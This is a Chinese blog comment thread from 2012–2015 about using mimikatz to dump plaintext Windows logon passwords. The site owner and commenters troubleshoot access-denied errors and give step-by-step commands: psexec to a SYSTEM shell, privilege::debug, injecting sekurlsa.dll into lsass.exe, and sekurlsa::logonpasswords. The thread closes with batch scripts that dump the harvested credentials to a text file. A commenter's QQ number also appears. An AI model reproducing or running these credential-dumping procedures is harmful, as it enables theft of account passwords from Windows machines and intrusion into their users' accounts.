轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码！

【匿名者】 @ 2012-02-24 13:11:01

最后的远程终端测试有效，非常强大！！
同时求一个findpassword软件。谢谢！

本站回复：

昨天睡觉，现在刚起来，这个软件我这里没存，网上应该有很多下载的，你找找看。

YHHK @ 2012-07-07 23:08:45

注入线程错误。0x00000005 拒绝访问怎么办

本站回复：

啥？？？？？？？？？？？

【匿名者】 @ 2012-11-03 05:00:20

请教一下为什么会读写000005内存错误。

本站回复：

请给出具体错误代码……

【匿名者】 @ 2012-11-03 05:13:24

对不起，刚才没把详细情况写出来，请站长把上面那条留言删了。
mimikatz # privilege::debug 这是第一条
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll 这是第二条
PROCESSENTRY32(lsass.exe).th32ProcessID = 1284
Erreur : Impossible d'injecter ! ; (0x00000005) 拒绝访问。
mimikatz #
这是什么原因造成的。系统是winxp3的（简洁版的）

本站回复：

这个错误是因为没有权限注入进程、或者注入失败造成的（会受杀毒软件干扰），具体原因不明。之前曾进行过测试，也是只有部分 Windows XP 可用。
使用这个方法试试：
//最简单实用的方法，使用 PsExec.exe 启动。
//在系统帐户中运行 cmd.exe，或者直接运行 mimikatz.exe
psexec -s cmd.exe
//启动 mimikatz.exe
C:mimikatz_trunkWin32mimikatz.exe
//提升权限
privilege::debug
//注入dll，要用绝对路径！并且路径中绝对不能有中文（可以有空格）！
inject::process lsass.exe "C:mimikatz_trunkWin32sekurlsa.dll"
//抓取密码
@getLogonPasswords

【匿名者】 @ 2012-11-03 05:14:37

对不起，刚才没把事情说明白了。系统是winxp3的简洁版。运行后出现下面情况。
mimikatz # privilege::debug 这是第一条
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll 这是第二条
PROCESSENTRY32(lsass.exe).th32ProcessID = 1284
Erreur : Impossible d'injecter ! ; (0x00000005) 拒绝访问。
mimikatz #

本站回复：

重复留言，请参考底下留言回复……　╮(╯_╰)╭

【匿名者】 @ 2012-11-03 05:16:44

汗，对不起，实在不是有意这样，不知道为什么，提示我验证码错误了，却把留言发出去了。麻烦站长删除了.

本站回复：

没关系，请参考底下留言回复……　╮(╯_╰)╭

佚名 @ 2012-11-14 19:32:28

我系统是windows7，运行mimikatz # inject::process lsass.exe c:UsersAdministratorsekurlsa.dll
出现PROCESSENTRY32(lsass.exe).th32ProcessID = 596
Erreur : Impossible d'injecter ! ; (0x00000005) 拒绝访问。
这是怎么回事啊？
我QQ是475856697.望解答。

本站回复：

这个错误是因为没有权限注入进程、或者注入失败造成的（会受杀毒软件干扰），具体原因不明。
使用这个方法试试：
//最简单实用的方法，使用 PsExec.exe 启动。
//在系统帐户中运行 cmd.exe，或者直接运行 mimikatz.exe
psexec -s cmd.exe
//启动 mimikatz.exe
C:mimikatz_trunkWin32mimikatz.exe
//提升权限
privilege::debug
//注入dll，要用绝对路径！并且路径中绝对不能有中文（可以有空格）！
inject::process lsass.exe "C:mimikatz_trunkWin32sekurlsa.dll"
//抓取密码
@getLogonPasswords

快速杀伤 @ 2012-11-14 19:37:10

我系统是windows7，运行mimikatz # inject::process lsass.exe c:UsersAdministratorsekurlsa.dll
出现PROCESSENTRY32(lsass.exe).th32ProcessID = 596
Erreur : Impossible d'injecter ! ; (0x00000005) 拒绝访问。
这是怎么回事啊？
我QQ是475856697.望解答。

本站回复：

重复留言，请参考底下留言回复……　╮(╯_╰)╭

佚名 @ 2012-11-14 19:45:07

不好意思，刚才多点了，但是还是不行啊……用了你说的方法出现
mimikatz # inject::process lsass.exe C:UsersAdministratorsekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 596
Erreur : Impossible d'injecter ! ; (0x00000005) 鎷掔粷璁块棶銆?

本站回复：

没有权限注入进程，注入失败，具体原因不明。

求帮助 @ 2014-02-09 20:19:51

楼主我想问一下怎么用这个神器破win7的自家密码啊。我的全是错误代码
比如（0x00000005）拒绝访问（这是1.0的）
2.0的是：error kuhl_m_privilege_simple然后是c0000061
这个软件对win7无力吗？我用的代码都是privilege::debug和sekurlsa::logonpasswords还有sekurlsa::wdigest
都有错误啊

本站回复：

这个不是破密码的，而是读取已登录用户内存缓存中的密码。你那个报错具体不清楚……

YYY @ 2014-09-17 02:03:38

核总，这个要怎么才能直接用一个命令就得到密码
cmd.exe /c c:xxxmimikatz.exe password.txt

command.txt里面放入那三句命令？

我试了一下不行，求方法

本站回复：

现在有很多类似的工具了，不需要那么复杂的操作了，你百度一下就有。

001 @ 2014-11-23 21:00:35

您好！我的系统是windows，我输入privilege::debug的时候出现
error kuhl_m_privilege_simple ; RtlAdjustPrivilege c0000061
请问这是什么意思？我是用管理员身份登录的。

本站回复：

需要以管理员权限运行：右键 --> 以管理员权限运行

佚名 @ 2015-03-21 21:02:13

2.0的版本怎么找 用这个方法不行

本站回复：

看官方具体说明吧。

wyp175 @ 2015-03-22 21:00:37

首先=_= 我是那个反向代理的人,现在暂时还没效果.然后我研究过这个mimikatz , 他是DOS界面 所以可以用bat启动,具体操作如下:
1.新建txt文本,改名start.bat
2.编辑bat,文本如下:
@Echo Off
title
color 3B
mode con: cols=37 lines=13
cd %~dp0
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" >>password.txt
pause
exit
分割线------------------------------------------------------------
3.保存后丢进和mimikatz.exe同一个文件夹内,然后启动start.bat,打开同目录下的passwords.txt 密码就在里面
4.若是不行可以试试下面命令:
@Echo Off
title
color 3B
mode con: cols=37 lines=13
cd %~dp0
mimikatz.exe "privilege::debug" "inject::process lsass.exe mimilib.dll" "sekurlsa::logonpasswords">>password.txt
pause
exit
这些都是我无聊写的,只是给懂得人一个思路
两个命令我记得是对mimikatz版本不同而设置的,好的 就这么多。

本站回复：

嗯，不错！